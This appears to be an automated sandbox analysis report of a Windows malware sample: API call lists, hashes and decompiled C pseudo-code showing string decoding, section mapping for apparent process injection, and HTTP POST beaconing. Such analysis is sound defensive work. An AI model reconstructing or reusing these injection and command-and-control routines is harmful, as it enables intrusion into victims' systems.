                                                                                                                                                                                                0x00afdda2
                                                                                                                                                                                                0x00afdda9
                                                                                                                                                                                                0x00afddaf
                                                                                                                                                                                                0x00afddb2
                                                                                                                                                                                                0x00afddb5
                                                                                                                                                                                                0x00afddb8
                                                                                                                                                                                                0x00afddbb
                                                                                                                                                                                                0x00afddf7
                                                                                                                                                                                                0x00afddf7
                                                                                                                                                                                                0x00afddfa
                                                                                                                                                                                                0x00afdea6
                                                                                                                                                                                                0x00afdeba
                                                                                                                                                                                                0x00afdeca
                                                                                                                                                                                                0x00afdece
                                                                                                                                                                                                0x00afded0
                                                                                                                                                                                                0x00afdee7

                                                                                                                                                                                                APIs
                                                                                                                                                                                                  • Part of subcall function 00AFD565: CoInitializeEx.OLE32(00000000,00000000,00000000,?,00000000,00000000,?,00AFD865,00000C5B,00000000,?,00000000), ref: 00AFD578
                                                                                                                                                                                                  • Part of subcall function 00AFD565: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,00AFD865,00000C5B,00000000,?,00000000), ref: 00AFD589
                                                                                                                                                                                                  • Part of subcall function 00AFD565: CoCreateInstance.OLE32(00B0B848,00000000,00000001,00B0B858,?,?,00AFD865,00000C5B,00000000,?,00000000), ref: 00AFD5A0
                                                                                                                                                                                                  • Part of subcall function 00AFD565: SysAllocString.OLEAUT32(00000000), ref: 00AFD5AB
                                                                                                                                                                                                  • Part of subcall function 00AFD565: CoSetProxyBlanket.OLE32(00000000,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,00AFD865,00000C5B,00000000,?,00000000), ref: 00AFD5D6
                                                                                                                                                                                                  • Part of subcall function 00AF85E5: RtlAllocateHeap.NTDLL(00000008,?,?,00AF8F65,00000100,?,00AF5FAC), ref: 00AF85F3
                                                                                                                                                                                                • SysAllocString.OLEAUT32(00000000), ref: 00AFDC27
                                                                                                                                                                                                • SysAllocString.OLEAUT32(00000000), ref: 00AFDC3B
                                                                                                                                                                                                • SysFreeString.OLEAUT32(?), ref: 00AFDFC4
                                                                                                                                                                                                • SysFreeString.OLEAUT32(?), ref: 00AFDFCD
                                                                                                                                                                                                  • Part of subcall function 00AF85FB: RtlFreeHeap.NTDLL(00000000,00000000,00000001,000000FF,00AF6024), ref: 00AF8641
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000011.00000002.592808629.0000000000AF0000.00000040.00020000.sdmp, Offset: 00AF0000, based on PE: true
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: String$AllocFree$HeapInitialize$AllocateBlanketCreateInstanceProxySecurity
                                                                                                                                                                                                • String ID: FALSE$TRUE
                                                                                                                                                                                                • API String ID: 1290676130-1412513891
                                                                                                                                                                                                • Opcode ID: 845d80b4afcefb54bbcd834f44bac553c28b7e31b1315447456bcafce04292d9
                                                                                                                                                                                                • Instruction ID: c2d4d907e72b66065f55d52140888c03d97700e2ba7f3f5975dec1d1a262cbf5
                                                                                                                                                                                                • Opcode Fuzzy Hash: 845d80b4afcefb54bbcd834f44bac553c28b7e31b1315447456bcafce04292d9
                                                                                                                                                                                                • Instruction Fuzzy Hash: 1DE14B71A0021DAFCB15EFE4C995EBEBBBAFF48300F104559F646AB291DB34A905CB50
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                C-Code - Quality: 59%
                                                                                                                                                                                                			E00AFC702(intOrPtr __ecx, intOrPtr __edx) {
                                                                                                                                                                                                				signed int _v8;
                                                                                                                                                                                                				char _v12;
                                                                                                                                                                                                				char _v16;
                                                                                                                                                                                                				intOrPtr _v20;
                                                                                                                                                                                                				char _v24;
                                                                                                                                                                                                				char _v28;
                                                                                                                                                                                                				char _v32;
                                                                                                                                                                                                				intOrPtr _v36;
                                                                                                                                                                                                				struct HINSTANCE__* _v40;
                                                                                                                                                                                                				char _v44;
                                                                                                                                                                                                				char _v56;
                                                                                                                                                                                                				char _v72;
                                                                                                                                                                                                				struct _WNDCLASSEXA _v120;
                                                                                                                                                                                                				intOrPtr _t69;
                                                                                                                                                                                                				intOrPtr _t71;
                                                                                                                                                                                                				intOrPtr _t75;
                                                                                                                                                                                                				intOrPtr _t80;
                                                                                                                                                                                                				intOrPtr _t92;
                                                                                                                                                                                                				intOrPtr _t95;
                                                                                                                                                                                                				intOrPtr _t96;
                                                                                                                                                                                                				struct HWND__* _t106;
                                                                                                                                                                                                				intOrPtr* _t113;
                                                                                                                                                                                                				struct HINSTANCE__* _t116;
                                                                                                                                                                                                				intOrPtr _t120;
                                                                                                                                                                                                				intOrPtr _t126;
                                                                                                                                                                                                				intOrPtr _t131;
                                                                                                                                                                                                				intOrPtr _t134;
                                                                                                                                                                                                				intOrPtr _t136;
                                                                                                                                                                                                				intOrPtr _t139;
                                                                                                                                                                                                				char _t140;
                                                                                                                                                                                                				intOrPtr _t141;
                                                                                                                                                                                                
                                                                                                                                                                                                				_t69 =  *0xb0e688; // 0xb20000
                                                                                                                                                                                                				_t126 = __ecx;
                                                                                                                                                                                                				_t134 = __edx;
                                                                                                                                                                                                				_t116 = 0;
                                                                                                                                                                                                				_v36 = __edx;
                                                                                                                                                                                                				_v16 = 0;
                                                                                                                                                                                                				_v44 = 0;
                                                                                                                                                                                                				_v40 = 0;
                                                                                                                                                                                                				_v12 = 0;
                                                                                                                                                                                                				_v8 = 0;
                                                                                                                                                                                                				_v24 = 0;
                                                                                                                                                                                                				_v20 = __ecx;
                                                                                                                                                                                                				if(( *(_t69 + 0x1898) & 0x00000040) != 0) {
                                                                                                                                                                                                					E00AFE280(0x1f4);
                                                                                                                                                                                                					_t116 = 0;
                                                                                                                                                                                                				}
                                                                                                                                                                                                				_t113 =  *((intOrPtr*)(_t134 + 0x3c)) + _t134;
                                                                                                                                                                                                				_v28 = _t116;
                                                                                                                                                                                                				if( *_t113 != 0x4550) {
                                                                                                                                                                                                					L12:
                                                                                                                                                                                                					if(_v8 != 0) {
                                                                                                                                                                                                						_t75 =  *0xb0e780; // 0x0
                                                                                                                                                                                                						 *((intOrPtr*)(_t75 + 0x10))(_t126, _v8);
                                                                                                                                                                                                						_v8 = _v8 & 0x00000000;
                                                                                                                                                                                                					}
                                                                                                                                                                                                					L14:
                                                                                                                                                                                                					if(_v12 != 0) {
                                                                                                                                                                                                						_t136 =  *0xb0e780; // 0x0
                                                                                                                                                                                                						 *((intOrPtr*)(_t136 + 0x10))(GetCurrentProcess(), _v12);
                                                                                                                                                                                                					}
                                                                                                                                                                                                					if(_v16 != 0) {
                                                                                                                                                                                                						_t71 =  *0xb0e780; // 0x0
                                                                                                                                                                                                						 *((intOrPtr*)(_t71 + 0x20))(_v16);
                                                                                                                                                                                                					}
                                                                                                                                                                                                					return _v8;
                                                                                                                                                                                                				}
                                                                                                                                                                                                				_push(_t116);
                                                                                                                                                                                                				_push(0x8000000);
                                                                                                                                                                                                				_v44 =  *((intOrPtr*)(_t113 + 0x50));
                                                                                                                                                                                                				_push(0x40);
                                                                                                                                                                                                				_push( &_v44);
                                                                                                                                                                                                				_push(_t116);
                                                                                                                                                                                                				_push(0xe);
                                                                                                                                                                                                				_push( &_v16);
                                                                                                                                                                                                				_t80 =  *0xb0e780; // 0x0
                                                                                                                                                                                                				if( *((intOrPtr*)(_t80 + 0xc))() < 0) {
                                                                                                                                                                                                					goto L12;
                                                                                                                                                                                                				}
                                                                                                                                                                                                				_v120.style = 0xb;
                                                                                                                                                                                                				_v120.cbSize = 0x30;
                                                                                                                                                                                                				_v120.lpszClassName =  &_v56;
                                                                                                                                                                                                				asm("movsd");
                                                                                                                                                                                                				_v120.lpfnWndProc = DefWindowProcA;
                                                                                                                                                                                                				asm("movsd");
                                                                                                                                                                                                				asm("movsd");
                                                                                                                                                                                                				asm("movsb");
                                                                                                                                                                                                				asm("movsd");
                                                                                                                                                                                                				asm("movsd");
                                                                                                                                                                                                				asm("movsw");
                                                                                                                                                                                                				asm("movsb");
                                                                                                                                                                                                				_v120.cbWndExtra = 0;
                                                                                                                                                                                                				_v120.lpszMenuName = 0;
                                                                                                                                                                                                				_v120.cbClsExtra = 0;
                                                                                                                                                                                                				_v120.hInstance = 0;
                                                                                                                                                                                                				if(RegisterClassExA( &_v120) != 0) {
                                                                                                                                                                                                					_t106 = CreateWindowExA(0,  &_v56,  &_v72, 0xcf0000, 0x80000000, 0x80000000, 0x1f4, 0x64, 0, 0, 0, 0);
                                                                                                                                                                                                					if(_t106 != 0) {
                                                                                                                                                                                                						DestroyWindow(_t106);
                                                                                                                                                                                                						UnregisterClassA( &_v56, 0);
                                                                                                                                                                                                					}
                                                                                                                                                                                                				}
                                                                                                                                                                                                				_t139 =  *0xb0e780; // 0x0
                                                                                                                                                                                                				_push(0x40);
                                                                                                                                                                                                				_push(0);
                                                                                                                                                                                                				_push(2);
                                                                                                                                                                                                				_push( &_v24);
                                                                                                                                                                                                				_push(0);
                                                                                                                                                                                                				_push(0);
                                                                                                                                                                                                				_push(0);
                                                                                                                                                                                                				_push( &_v12);
                                                                                                                                                                                                				_push(GetCurrentProcess());
                                                                                                                                                                                                				_push(_v16);
                                                                                                                                                                                                				if( *((intOrPtr*)(_t139 + 0x14))() < 0) {
                                                                                                                                                                                                					_t126 = _v20;
                                                                                                                                                                                                					goto L12;
                                                                                                                                                                                                				} else {
                                                                                                                                                                                                					_push(0x40);
                                                                                                                                                                                                					_push(0);
                                                                                                                                                                                                					_push(2);
                                                                                                                                                                                                					_push( &_v24);
                                                                                                                                                                                                					_push(0);
                                                                                                                                                                                                					_push(0);
                                                                                                                                                                                                					_push(0);
                                                                                                                                                                                                					_t126 = _v20;
                                                                                                                                                                                                					_push( &_v8);
                                                                                                                                                                                                					_t92 =  *0xb0e780; // 0x0
                                                                                                                                                                                                					_push(_t126);
                                                                                                                                                                                                					_push(_v16);
                                                                                                                                                                                                					if( *((intOrPtr*)(_t92 + 0x14))() < 0) {
                                                                                                                                                                                                						goto L12;
                                                                                                                                                                                                					}
                                                                                                                                                                                                					_t140 = E00AF864A( *0xb0e688, 0x1ac4);
                                                                                                                                                                                                					_v32 = _t140;
                                                                                                                                                                                                					if(_t140 == 0) {
                                                                                                                                                                                                						goto L12;
                                                                                                                                                                                                					}
                                                                                                                                                                                                					 *((intOrPtr*)(_t140 + 0x224)) = _v8;
                                                                                                                                                                                                					_t95 =  *0xb0e684; // 0x4d3f6c8
                                                                                                                                                                                                					_t96 =  *((intOrPtr*)(_t95 + 0x54))(_t126, 0, 0x1ac4, 0x1000, 4);
                                                                                                                                                                                                					_t120 =  *0xb0e684; // 0x4d3f6c8
                                                                                                                                                                                                					_t131 = _t96;
                                                                                                                                                                                                					 *((intOrPtr*)(_t120 + 0x20))(_v20, _t131, _t140, 0x1ac4,  &_v28);
                                                                                                                                                                                                					E00AF85FB( &_v32, 0x1ac4);
                                                                                                                                                                                                					_t141 =  *0xb0e688; // 0xb20000
                                                                                                                                                                                                					 *0xb0e688 = _t131;
                                                                                                                                                                                                					E00AF86C2(_v12, _v36,  *((intOrPtr*)(_t113 + 0x50)));
                                                                                                                                                                                                					E00AFC681(_v12, _v8, _v36);
                                                                                                                                                                                                					 *0xb0e688 = _t141;
                                                                                                                                                                                                					goto L14;
                                                                                                                                                                                                				}
                                                                                                                                                                                                			}


































                                                                                                                                                                                                0x00afc917
                                                                                                                                                                                                0x00afc924
                                                                                                                                                                                                0x00afc924
                                                                                                                                                                                                0x00afc92d
                                                                                                                                                                                                0x00afc92f
                                                                                                                                                                                                0x00afc937
                                                                                                                                                                                                0x00afc937
                                                                                                                                                                                                0x00afc93e
                                                                                                                                                                                                0x00afc93e
                                                                                                                                                                                                0x00afc75a
                                                                                                                                                                                                0x00afc75b
                                                                                                                                                                                                0x00afc760
                                                                                                                                                                                                0x00afc766
                                                                                                                                                                                                0x00afc768
                                                                                                                                                                                                0x00afc769
                                                                                                                                                                                                0x00afc76a
                                                                                                                                                                                                0x00afc76f
                                                                                                                                                                                                0x00afc770
                                                                                                                                                                                                0x00afc77a
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00afc785
                                                                                                                                                                                                0x00afc78f
                                                                                                                                                                                                0x00afc799
                                                                                                                                                                                                0x00afc79c
                                                                                                                                                                                                0x00afc7a2
                                                                                                                                                                                                0x00afc7a9
                                                                                                                                                                                                0x00afc7aa
                                                                                                                                                                                                0x00afc7ab
                                                                                                                                                                                                0x00afc7b4
                                                                                                                                                                                                0x00afc7b5
                                                                                                                                                                                                0x00afc7b6
                                                                                                                                                                                                0x00afc7b8
                                                                                                                                                                                                0x00afc7bb
                                                                                                                                                                                                0x00afc7be
                                                                                                                                                                                                0x00afc7c1
                                                                                                                                                                                                0x00afc7c4
                                                                                                                                                                                                0x00afc7d0
                                                                                                                                                                                                0x00afc7f2
                                                                                                                                                                                                0x00afc7fa
                                                                                                                                                                                                0x00afc7fd
                                                                                                                                                                                                0x00afc808
                                                                                                                                                                                                0x00afc808
                                                                                                                                                                                                0x00afc7fa
                                                                                                                                                                                                0x00afc80e
                                                                                                                                                                                                0x00afc817
                                                                                                                                                                                                0x00afc819
                                                                                                                                                                                                0x00afc81a
                                                                                                                                                                                                0x00afc81c
                                                                                                                                                                                                0x00afc81d
                                                                                                                                                                                                0x00afc81e
                                                                                                                                                                                                0x00afc81f
                                                                                                                                                                                                0x00afc823
                                                                                                                                                                                                0x00afc82a
                                                                                                                                                                                                0x00afc82b
                                                                                                                                                                                                0x00afc833
                                                                                                                                                                                                0x00afc8f4
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00afc839
                                                                                                                                                                                                0x00afc839
                                                                                                                                                                                                0x00afc83b
                                                                                                                                                                                                0x00afc83c
                                                                                                                                                                                                0x00afc841
                                                                                                                                                                                                0x00afc842
                                                                                                                                                                                                0x00afc843
                                                                                                                                                                                                0x00afc844
                                                                                                                                                                                                0x00afc845
                                                                                                                                                                                                0x00afc84b
                                                                                                                                                                                                0x00afc84c
                                                                                                                                                                                                0x00afc851
                                                                                                                                                                                                0x00afc852
                                                                                                                                                                                                0x00afc85a
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00afc870
                                                                                                                                                                                                0x00afc872
                                                                                                                                                                                                0x00afc879
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00afc88a
                                                                                                                                                                                                0x00afc890
                                                                                                                                                                                                0x00afc898
                                                                                                                                                                                                0x00afc89b
                                                                                                                                                                                                0x00afc8a1
                                                                                                                                                                                                0x00afc8b1
                                                                                                                                                                                                0x00afc8bd
                                                                                                                                                                                                0x00afc8c2
                                                                                                                                                                                                0x00afc8c8
                                                                                                                                                                                                0x00afc8d8
                                                                                                                                                                                                0x00afc8e4
                                                                                                                                                                                                0x00afc8ec
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00afc8ec

APIs
• RegisterClassExA.USER32(00000030), ref: 00AFC7C7
• CreateWindowExA.USER32 ref: 00AFC7F2
• DestroyWindow.USER32(00000000), ref: 00AFC7FD
• UnregisterClassA.USER32 ref: 00AFC808
• GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 00AFC824
• GetCurrentProcess.KERNEL32(00000000), ref: 00AFC91D
  • Part of subcall function 00AF85FB: RtlFreeHeap.NTDLL(00000000,00000000,00000001,000000FF,00AF6024), ref: 00AF8641
Strings
Memory Dump Source
• Source File: 00000011.00000002.592808629.0000000000AF0000.00000040.00020000.sdmp, Offset: 00AF0000, based on PE: true
Yara matches
Similarity
• API ID: ClassCurrentProcessWindow$CreateDestroyFreeHeapRegisterUnregister
• String ID: 0$cdcdwqwqwq$sadccdcdsasa
• API String ID: 3082384575-2319545179
• Opcode ID: da8289f534f63865e4c176ea3a4cc858ae2cb9b9c634e6277b0bae4d3ecf4f01
• Instruction ID: 2df8389ffe741310183eace91278b5876be1cb5c2726de8f4547319df6f3cb63
• Opcode Fuzzy Hash: da8289f534f63865e4c176ea3a4cc858ae2cb9b9c634e6277b0bae4d3ecf4f01
• Instruction Fuzzy Hash: 3A71487190020DAFEB11CF95DE48EEEBBB9FB59710F200469F605A7290DB70AA04CB64
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 78%
_entry_(void* __edx, struct HINSTANCE__* _a4, WCHAR* _a8) {
	char _v8;
	char _v16;
	short _v144;
	short _v664;
	void* _t19;
	struct HINSTANCE__* _t22;
	long _t23;
	long _t24;
	char* _t27;
	WCHAR* _t32;
	long _t33;
	intOrPtr _t37;
	intOrPtr _t38;
	void* _t49;
	int _t53;
	void* _t54;
	intOrPtr* _t55;
	void* _t57;

	_t49 = __edx;
	OutputDebugStringA("Hello qqq");
	if(_a8 != 1) {
		if(_a8 != 0) {
			L12:
			return 1;
		}
		SetLastError(0xaa);
		L10:
		return 0;
	}
	E00AF85D0();
	_t19 = E00AF97ED( &_v16);
	_t57 = _t49;
	if(_t57 < 0 || _t57 <= 0 && _t19 < 0x2e830) {
		goto L12;
                                                                                                                                                                                                				} else {
                                                                                                                                                                                                					E00AF8F59();
                                                                                                                                                                                                					GetModuleHandleA(0);
                                                                                                                                                                                                					_t22 = _a4;
                                                                                                                                                                                                					 *0xb0e69c = _t22;
                                                                                                                                                                                                					_t23 = GetModuleFileNameW(_t22,  &_v664, 0x104);
                                                                                                                                                                                                					_t24 = GetLastError();
                                                                                                                                                                                                					if(_t23 != 0 && _t24 != 0x7a) {
                                                                                                                                                                                                						memset( &_v144, 0, 0x80);
                                                                                                                                                                                                						_t55 = _t54 + 0xc;
                                                                                                                                                                                                						_t53 = 0;
                                                                                                                                                                                                						do {
                                                                                                                                                                                                							_t27 = E00AF95A8(_t53);
                                                                                                                                                                                                							_a8 = _t27;
                                                                                                                                                                                                							MultiByteToWideChar(0, 0, _t27, 0xffffffff,  &_v144, 0x3f);
                                                                                                                                                                                                							E00AF85A3( &_a8);
                                                                                                                                                                                                							_t53 = _t53 + 1;
                                                                                                                                                                                                						} while (_t53 < 0x2710);
                                                                                                                                                                                                						E00B02A93( *0xb0e69c);
                                                                                                                                                                                                						 *_t55 = 0x7c3;
                                                                                                                                                                                                						 *0xb0e684 = E00AFE1FE(0xb0ba20, 0x11c);
                                                                                                                                                                                                						 *_t55 = 0xb4e;
                                                                                                                                                                                                						_t32 = E00AF95C2(0xb0ba20);
                                                                                                                                                                                                						_a8 = _t32;
                                                                                                                                                                                                						_t33 = GetFileAttributesW(_t32);
                                                                                                                                                                                                						_push( &_a8);
                                                                                                                                                                                                						if(_t33 == 0xffffffff) {
                                                                                                                                                                                                							E00AF85B6();
                                                                                                                                                                                                							_v8 = 0;
                                                                                                                                                                                                							_t37 =  *0xb0e684; // 0x4d3f6c8
                                                                                                                                                                                                							_t38 =  *((intOrPtr*)(_t37 + 0x70))(0, 0, E00AF5DE7, 0, 0,  &_v8);
                                                                                                                                                                                                							 *0xb0e6a8 = _t38;
                                                                                                                                                                                                							if(_t38 == 0) {
                                                                                                                                                                                                								goto L10;
                                                                                                                                                                                                							}
                                                                                                                                                                                                							goto L12;
                                                                                                                                                                                                						}
                                                                                                                                                                                                						E00AF85B6();
                                                                                                                                                                                                					}
                                                                                                                                                                                                					goto L10;
                                                                                                                                                                                                				}
                                                                                                                                                                                                			}






















                                                                                                                                                                                                APIs
                                                                                                                                                                                                • OutputDebugStringA.KERNEL32(Hello qqq), ref: 00AF5F73
                                                                                                                                                                                                • SetLastError.KERNEL32(000000AA), ref: 00AF60B8
                                                                                                                                                                                                  • Part of subcall function 00AF85D0: HeapCreate.KERNELBASE(00000000,00080000,00000000,00AF5F88), ref: 00AF85D9
                                                                                                                                                                                                  • Part of subcall function 00AF97ED: GetSystemTimeAsFileTime.KERNEL32(?,?,00AF5F90), ref: 00AF97FA
                                                                                                                                                                                                  • Part of subcall function 00AF97ED: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00AF981A
                                                                                                                                                                                                • GetModuleHandleA.KERNEL32(00000000), ref: 00AF5FAD
                                                                                                                                                                                                • GetModuleFileNameW.KERNEL32(?,?,00000104), ref: 00AF5FC8
                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 00AF5FD0
                                                                                                                                                                                                • memset.MSVCRT ref: 00AF5FF4
                                                                                                                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,0000003F), ref: 00AF6016
                                                                                                                                                                                                • GetFileAttributesW.KERNEL32(00000000), ref: 00AF6064
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000011.00000002.592808629.0000000000AF0000.00000040.00020000.sdmp, Offset: 00AF0000, based on PE: true
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: File$ErrorLastModuleTime$AttributesByteCharCreateDebugHandleHeapMultiNameOutputStringSystemUnothrow_t@std@@@Wide__ehfuncinfo$??2@memset
                                                                                                                                                                                                • String ID: Hello qqq
                                                                                                                                                                                                • API String ID: 1203100507-3610097158
                                                                                                                                                                                                • Opcode ID: 29c24d65efceb04c48cfef37d382757907e94a34deb8194cc14395cb9ed7d1ff
                                                                                                                                                                                                • Instruction ID: 7b117058ac80979e7adf19b67c22004bb7b3f1b8c6efebf10863ba39ea7edb80
                                                                                                                                                                                                • Opcode Fuzzy Hash: 29c24d65efceb04c48cfef37d382757907e94a34deb8194cc14395cb9ed7d1ff
                                                                                                                                                                                                • Instruction Fuzzy Hash: 1831D471900109ABDB24AFB1ED49EBE7BB8EF50710F20C529F665C7191EF348A48CB21
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                C-Code - Quality: 83%
                                                                                                                                                                                                			E00AFE6AA(void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12, intOrPtr* _a16, intOrPtr* _a20, intOrPtr _a24) {
                                                                                                                                                                                                				char _v8;
                                                                                                                                                                                                				char _v12;
                                                                                                                                                                                                				signed int _v16;
                                                                                                                                                                                                				signed int _v20;
                                                                                                                                                                                                				char _v24;
                                                                                                                                                                                                				intOrPtr _v28;
                                                                                                                                                                                                				char _v32;
                                                                                                                                                                                                				intOrPtr _v36;
                                                                                                                                                                                                				signed int _v40;
                                                                                                                                                                                                				signed int _v44;
                                                                                                                                                                                                				intOrPtr _v48;
                                                                                                                                                                                                				intOrPtr _v52;
                                                                                                                                                                                                				intOrPtr _v56;
                                                                                                                                                                                                				intOrPtr _v60;
                                                                                                                                                                                                				char _v64;
                                                                                                                                                                                                				int _v76;
                                                                                                                                                                                                				void* _v80;
                                                                                                                                                                                                				intOrPtr _v100;
                                                                                                                                                                                                				int _v104;
                                                                                                                                                                                                				void* _v108;
                                                                                                                                                                                                				intOrPtr _v112;
                                                                                                                                                                                                				intOrPtr _v116;
                                                                                                                                                                                                				char* _v120;
                                                                                                                                                                                                				void _v124;
                                                                                                                                                                                                				char _v140;
                                                                                                                                                                                                				void _v396;
                                                                                                                                                                                                				void _v652;
                                                                                                                                                                                                				intOrPtr _t105;
                                                                                                                                                                                                				intOrPtr _t113;
                                                                                                                                                                                                				intOrPtr* _t115;
                                                                                                                                                                                                				intOrPtr _t118;
                                                                                                                                                                                                				intOrPtr _t121;
                                                                                                                                                                                                				intOrPtr _t124;
                                                                                                                                                                                                				intOrPtr _t127;
                                                                                                                                                                                                				intOrPtr _t131;
                                                                                                                                                                                                				char _t133;
                                                                                                                                                                                                				intOrPtr _t136;
                                                                                                                                                                                                				char _t138;
                                                                                                                                                                                                				char _t139;
                                                                                                                                                                                                				intOrPtr _t141;
                                                                                                                                                                                                				intOrPtr _t147;
                                                                                                                                                                                                				intOrPtr _t154;
                                                                                                                                                                                                				intOrPtr _t158;
                                                                                                                                                                                                				intOrPtr _t162;
                                                                                                                                                                                                				intOrPtr _t164;
                                                                                                                                                                                                				intOrPtr _t166;
                                                                                                                                                                                                				intOrPtr _t172;
                                                                                                                                                                                                				intOrPtr _t176;
                                                                                                                                                                                                				void* _t183;
                                                                                                                                                                                                				void* _t185;
                                                                                                                                                                                                				intOrPtr _t186;
                                                                                                                                                                                                				char _t195;
                                                                                                                                                                                                				intOrPtr _t203;
                                                                                                                                                                                                				intOrPtr _t204;
                                                                                                                                                                                                				signed int _t209;
                                                                                                                                                                                                				void _t212;
                                                                                                                                                                                                				intOrPtr _t213;
                                                                                                                                                                                                				void* _t214;
                                                                                                                                                                                                				intOrPtr _t216;
                                                                                                                                                                                                				char _t217;
                                                                                                                                                                                                				intOrPtr _t218;
                                                                                                                                                                                                				signed int _t219;
                                                                                                                                                                                                				signed int _t220;
                                                                                                                                                                                                				void* _t221;
                                                                                                                                                                                                
                                                                                                                                                                                                				_v40 = _v40 & 0x00000000;
                                                                                                                                                                                                				_v24 = 4;
                                                                                                                                                                                                				_v36 = 1;
                                                                                                                                                                                                				_t214 = __edx;
                                                                                                                                                                                                				memset( &_v396, 0, 0x100);
                                                                                                                                                                                                				memset( &_v652, 0, 0x100);
                                                                                                                                                                                                				_v64 = E00AF95A8(0x85b);
                                                                                                                                                                                                				_v60 = E00AF95A8(0xdc9);
                                                                                                                                                                                                				_v56 = E00AF95A8(0x65d);
                                                                                                                                                                                                				_v52 = E00AF95A8(0xdd3);
                                                                                                                                                                                                				_t105 = E00AF95A8(0xb74);
                                                                                                                                                                                                				_v44 = _v44 & 0;
                                                                                                                                                                                                				_t212 = 0x3c;
                                                                                                                                                                                                				_v48 = _t105;
                                                                                                                                                                                                				memset( &_v124, 0, 0x100);
                                                                                                                                                                                                				_v116 = 0x10;
                                                                                                                                                                                                				_v120 =  &_v140;
                                                                                                                                                                                                				_v124 = _t212;
                                                                                                                                                                                                				_v108 =  &_v396;
                                                                                                                                                                                                				_v104 = 0x100;
                                                                                                                                                                                                				_v80 =  &_v652;
                                                                                                                                                                                                				_push( &_v124);
                                                                                                                                                                                                				_push(0);
                                                                                                                                                                                                				_v76 = 0x100;
                                                                                                                                                                                                				_push(E00AFC3BB(_t214));
                                                                                                                                                                                                				_t113 =  *0xb0e6a4; // 0x4d3fc30
                                                                                                                                                                                                				_push(_t214);
                                                                                                                                                                                                				if( *((intOrPtr*)(_t113 + 0x28))() != 0) {
                                                                                                                                                                                                					_t209 = 0;
                                                                                                                                                                                                					_v20 = 0;
                                                                                                                                                                                                					do {
                                                                                                                                                                                                						_t115 =  *0xb0e6a4; // 0x4d3fc30
                                                                                                                                                                                                						_v12 = 0x8404f700;
                                                                                                                                                                                                						_t213 =  *_t115( *0xb0e788,  *((intOrPtr*)(_t221 + _t209 * 4 - 0x24)), 0, 0, 0);
                                                                                                                                                                                                						if(_t213 != 0) {
                                                                                                                                                                                                							_t195 = 3;
                                                                                                                                                                                                							_t185 = 4;
                                                                                                                                                                                                							_v8 = _t195;
                                                                                                                                                                                                							_t118 =  *0xb0e6a4; // 0x4d3fc30
                                                                                                                                                                                                							 *((intOrPtr*)(_t118 + 0x14))(_t213, _t195,  &_v8, _t185);
                                                                                                                                                                                                							_v8 = 0x3a98;
                                                                                                                                                                                                							_t121 =  *0xb0e6a4; // 0x4d3fc30
                                                                                                                                                                                                							 *((intOrPtr*)(_t121 + 0x14))(_t213, 2,  &_v8, _t185);
                                                                                                                                                                                                							_v8 = 0x493e0;
                                                                                                                                                                                                							_t124 =  *0xb0e6a4; // 0x4d3fc30
                                                                                                                                                                                                							 *((intOrPtr*)(_t124 + 0x14))(_t213, 6,  &_v8, _t185);
                                                                                                                                                                                                							_v8 = 0x493e0;
                                                                                                                                                                                                							_t127 =  *0xb0e6a4; // 0x4d3fc30
                                                                                                                                                                                                							 *((intOrPtr*)(_t127 + 0x14))(_t213, 5,  &_v8, _t185);
                                                                                                                                                                                                							_t131 =  *0xb0e6a4; // 0x4d3fc30
                                                                                                                                                                                                							_t186 =  *((intOrPtr*)(_t131 + 0x1c))(_t213,  &_v396, _v100, 0, 0, 3, 0, 0);
                                                                                                                                                                                                							if(_a24 != 0) {
                                                                                                                                                                                                								E00AF97ED(_a24);
                                                                                                                                                                                                							}
                                                                                                                                                                                                							if(_t186 != 0) {
                                                                                                                                                                                                								_t133 = 0x8484f700;
                                                                                                                                                                                                								if(_v112 != 4) {
                                                                                                                                                                                                									_t133 = _v12;
                                                                                                                                                                                                								}
                                                                                                                                                                                                								_t136 =  *0xb0e6a4; // 0x4d3fc30
                                                                                                                                                                                                								_t216 =  *((intOrPtr*)(_t136 + 0x20))(_t186, "POST",  &_v652, 0, 0,  &_v64, _t133, 0);
                                                                                                                                                                                                								_v8 = _t216;
                                                                                                                                                                                                								if(_a24 != 0) {
                                                                                                                                                                                                									E00AF97ED(_a24);
                                                                                                                                                                                                								}
                                                                                                                                                                                                								if(_t216 != 0) {
                                                                                                                                                                                                									_t138 = 4;
                                                                                                                                                                                                									if(_v112 != _t138) {
                                                                                                                                                                                                										L19:
                                                                                                                                                                                                										_t139 = E00AF95A8(0x777);
                                                                                                                                                                                                										_t217 = _t139;
                                                                                                                                                                                                										_v12 = _t217;
                                                                                                                                                                                                										_t141 =  *0xb0e6a4; // 0x4d3fc30
                                                                                                                                                                                                										_t218 = _v8;
                                                                                                                                                                                                										_v28 =  *((intOrPtr*)(_t141 + 0x24))(_t218, _t217, E00AFC3BB(_t217), _a4, _a8);
                                                                                                                                                                                                										E00AF85A3( &_v12);
                                                                                                                                                                                                										if(_a24 != 0) {
                                                                                                                                                                                                											E00AF97ED(_a24);
                                                                                                                                                                                                										}
                                                                                                                                                                                                										if(_v28 != 0) {
